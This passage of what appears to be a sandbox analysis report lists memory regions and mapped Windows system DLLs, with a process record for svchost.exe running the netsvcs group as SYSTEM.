(normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 701 start_va = 0x70790000 end_va = 0x707a3fff monitored = 0 entry_point = 0x7079ac00 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\System32\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\system32\\vcruntime140_clr0400.dll") Region: id = 702 start_va = 0x6c2f0000 end_va = 0x6c39afff monitored = 0 entry_point = 0x6c385f20 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\System32\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\system32\\ucrtbase_clr0400.dll") Region: id = 703 start_va = 0x1d0000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 704 start_va = 0x71990000 end_va = 0x71992fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 705 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 706 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 707 start_va = 0x1d0000 end_va = 0x20bfff monitored = 0 entry_point = 0x1d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 708 start_va = 0x250000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 709 start_va = 0x1d0000 end_va = 0x20bfff monitored = 0 entry_point = 0x1d128d region_type = mapped_file name = "rsaenh.dll" 
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 710 start_va = 0x1d0000 end_va = 0x20bfff monitored = 0 entry_point = 0x1d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 711 start_va = 0x1d0000 end_va = 0x20bfff monitored = 0 entry_point = 0x1d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 712 start_va = 0x1d0000 end_va = 0x20bfff monitored = 0 entry_point = 0x1d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 713 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 714 start_va = 0x410000 end_va = 0x6defff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 715 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 716 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 717 start_va = 0x50000 end_va = 0x50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 718 start_va = 0x1d0000 end_va = 0x1d6fff 
monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 719 start_va = 0x50000 end_va = 0x50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 720 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Thread: id = 24 os_tid = 0x8c4 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ef471a0" os_pid = "0x330" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon 
Session 00000000:0000ae26" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 778 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 779 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 780 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 781 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 782 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 783 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 784 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 785 start_va = 0x170000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 786 start_va = 0x1b0000 end_va = 0x216fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 787 start_va = 0x220000 end_va = 0x2e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 788 start_va = 0x2f0000 end_va = 0x2f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002f0000" filename = "" Region: id = 789 start_va = 0x300000 end_va = 0x300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 790 start_va = 0x310000 end_va = 0x310fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 791 start_va = 0x320000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 792 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 793 start_va = 0x370000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 794 start_va = 0x480000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 795 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 796 start_va = 0x540000 end_va = 0x54afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 797 start_va = 0x550000 end_va = 0x553fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 798 start_va = 0x560000 end_va = 0x569fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 799 start_va = 
0x570000 end_va = 0x57cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 800 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 801 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 802 start_va = 0x5d0000 end_va = 0x5d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 803 start_va = 0x5e0000 end_va = 0x5e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 804 start_va = 0x5f0000 end_va = 0x5f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 805 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 806 start_va = 0x610000 end_va = 0x610fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 807 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 808 start_va = 0x630000 end_va = 0x63dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 809 start_va = 0x640000 end_va = 0x643fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = 
"\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 810 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 811 start_va = 0x690000 end_va = 0x69dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 812 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 813 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 814 start_va = 0x6c0000 end_va = 0x6c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 815 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 816 start_va = 0x6e0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000008.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000008.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000008.db") Region: id = 817 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 818 start_va = 0x720000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 819 start_va = 0x730000 end_va = 
0x730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 820 start_va = 0x740000 end_va = 0x741fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 821 start_va = 0x750000 end_va = 0x757fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 822 start_va = 0x760000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 823 start_va = 0x7a0000 end_va = 0x7a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 824 start_va = 0x7b0000 end_va = 0x7b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 825 start_va = 0x7c0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 826 start_va = 0x800000 end_va = 0xacefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 827 start_va = 0xad0000 end_va = 0xaebfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 828 start_va = 0xaf0000 end_va = 0xb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 829 start_va = 0xb30000 end_va = 0xb30fff monitored = 0 entry_point = 0x0 region_type = mapped_file 
name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 830 start_va = 0xb40000 end_va = 0xb40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 831 start_va = 0xb50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 832 start_va = 0xb60000 end_va = 0xb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 833 start_va = 0xb70000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 834 start_va = 0xbb0000 end_va = 0xbb7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 835 start_va = 0xbc0000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 836 start_va = 0xbd0000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 837 start_va = 0xbe0000 end_va = 0xbe0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 838 start_va = 0xbf0000 end_va = 0xc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 839 start_va = 0xc10000 end_va = 0xc12fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: 
"c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 840 start_va = 0xc20000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 841 start_va = 0xc30000 end_va = 0xc30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 842 start_va = 0xc40000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 843 start_va = 0xc80000 end_va = 0xc8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 844 start_va = 0xcb0000 end_va = 0xcbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 845 start_va = 0xcc0000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 846 start_va = 0xcd0000 end_va = 0xdcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 847 start_va = 0xdd0000 end_va = 0xddffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 848 start_va = 0xde0000 end_va = 0xde7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 849 start_va = 0xdf0000 end_va = 0xe2ffff monitored = 1 entry_point = 0x0 region_type = private name = 
"private_0x0000000000df0000" filename = "" Region: id = 850 start_va = 0xe30000 end_va = 0xe3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 851 start_va = 0xe40000 end_va = 0xe4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 852 start_va = 0xe50000 end_va = 0xe57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 853 start_va = 0xe60000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 854 start_va = 0xea0000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 855 start_va = 0xee0000 end_va = 0xeeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 856 start_va = 0xf00000 end_va = 0xf3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 857 start_va = 0xf70000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 858 start_va = 0xfe0000 end_va = 0xfe7fff monitored = 0 entry_point = 0xfe2104 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 859 start_va = 0x1000000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 860 start_va = 0x1040000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 861 start_va = 0x1050000 end_va = 0x108ffff monitored = 1 entry_point = 0x0 region_type = private name = 
"private_0x0000000001050000" filename = "" Region: id = 862 start_va = 0x1090000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 863 start_va = 0x10e0000 end_va = 0x1145fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 864 start_va = 0x1170000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 865 start_va = 0x11e0000 end_va = 0x121ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 866 start_va = 0x1220000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 867 start_va = 0x12d0000 end_va = 0x130ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 868 start_va = 0x1330000 end_va = 0x136ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 869 start_va = 0x1370000 end_va = 0x146ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 870 start_va = 0x1490000 end_va = 0x14cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001490000" filename = "" Region: id = 871 start_va = 0x14e0000 end_va = 0x151ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 872 start_va = 0x1520000 end_va = 0x155ffff monitored = 
1 entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 873 start_va = 0x1570000 end_va = 0x15affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001570000" filename = "" Region: id = 874 start_va = 0x1610000 end_va = 0x164ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 875 start_va = 0x1690000 end_va = 0x16cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 876 start_va = 0x16f0000 end_va = 0x172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 877 start_va = 0x1730000 end_va = 0x176ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 878 start_va = 0x17c0000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 879 start_va = 0x1800000 end_va = 0x183ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 880 start_va = 0x1850000 end_va = 0x188ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001850000" filename = "" Region: id = 881 start_va = 0x18a0000 end_va = 0x18dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 882 start_va = 0x1980000 end_va = 0x19bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001980000" filename = "" Region: id = 883 start_va = 0x1a00000 end_va = 0x1a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 884 start_va = 0x1a80000 end_va = 0x1a8ffff monitored = 1 entry_point = 0x0 region_type = private name = 
"private_0x0000000001a80000" filename = "" Region: id = 885 start_va = 0x1ad0000 end_va = 0x1b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ad0000" filename = "" Region: id = 886 start_va = 0x1b20000 end_va = 0x1b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b20000" filename = "" Region: id = 887 start_va = 0x1bb0000 end_va = 0x1beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bb0000" filename = "" Region: id = 888 start_va = 0x1c50000 end_va = 0x1c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 889 start_va = 0x1c70000 end_va = 0x1caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 890 start_va = 0x1cb0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 891 start_va = 0x1db0000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 892 start_va = 0x1fb0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 893 start_va = 0x20a0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 894 start_va = 0x20e0000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 895 start_va = 0x2120000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002120000" filename = "" Region: id = 896 start_va = 0x2130000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002130000" filename = "" 
Region: id = 897 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002140000" filename = "" Region: id = 898 start_va = 0x2150000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002150000" filename = "" Region: id = 899 start_va = 0x2160000 end_va = 0x216ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002160000" filename = "" Region: id = 900 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002170000" filename = "" Region: id = 901 start_va = 0x2180000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 902 start_va = 0x22b0000 end_va = 0x22effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 903 start_va = 0x2480000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002480000" filename = "" Region: id = 904 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 905 start_va = 0x2590000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 906 start_va = 0x25a0000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 907 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 908 start_va = 0x25c0000 end_va = 0x25cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000025c0000" filename = "" Region: id = 909 start_va = 0x25d0000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 910 start_va = 0x25e0000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 911 start_va = 0x2660000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 912 start_va = 0x26a0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 913 start_va = 0x26e0000 end_va = 0x2adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 914 start_va = 0x2b20000 end_va = 0x2c1ffff monitored = 1 entry_point = 0x0 region_type = private name = 